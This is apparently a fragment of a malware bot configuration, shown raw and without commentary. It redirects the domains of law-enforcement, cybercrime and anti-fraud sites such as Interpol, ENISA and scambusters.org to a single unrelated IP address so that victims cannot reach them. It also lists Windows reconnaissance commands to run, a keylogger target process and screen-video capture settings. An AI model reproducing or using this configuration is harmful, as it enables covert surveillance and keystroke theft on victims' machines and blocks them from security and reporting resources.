ripe.net=209.85.229.104
www.ripe.net=209.85.229.104
www.met.police.uk=209.85.229.104
nbi.gov.ph=209.85.229.104
www.nbi.gov.ph=209.85.229.104
www.police.gov.hk=209.85.229.104
treasury.gov=209.85.229.104
www.treasury.gov=209.85.229.104
cybercrime.gov=209.85.229.104
www.cybercrime.gov=209.85.229.104
www.cybercrime.ch=209.85.229.104
enisa.europa.eu=209.85.229.104
www.enisa.europa.eu=209.85.229.104
www.interpol.int=209.85.229.104
www.fsa.gov.uk=209.85.229.104
www.companies-house.gov.uk=209.85.229.104
fraudaid.com=209.85.229.104
www.fraudaid.com=209.85.229.104
scambusters.org=209.85.229.104
www.scambusters.org=209.85.229.104
spamtrackers.eu=209.85.229.104
www.spamtrackers.eu=209.85.229.104
  end
  entry "CmdList"
    "net view"
    "tasklist"
            "set"
  end
 
   entry "Keylogger"
    processes "calc___.exe"
    time 1
  end
 
  entry "Video"
    quality 1
    length 500
  end
end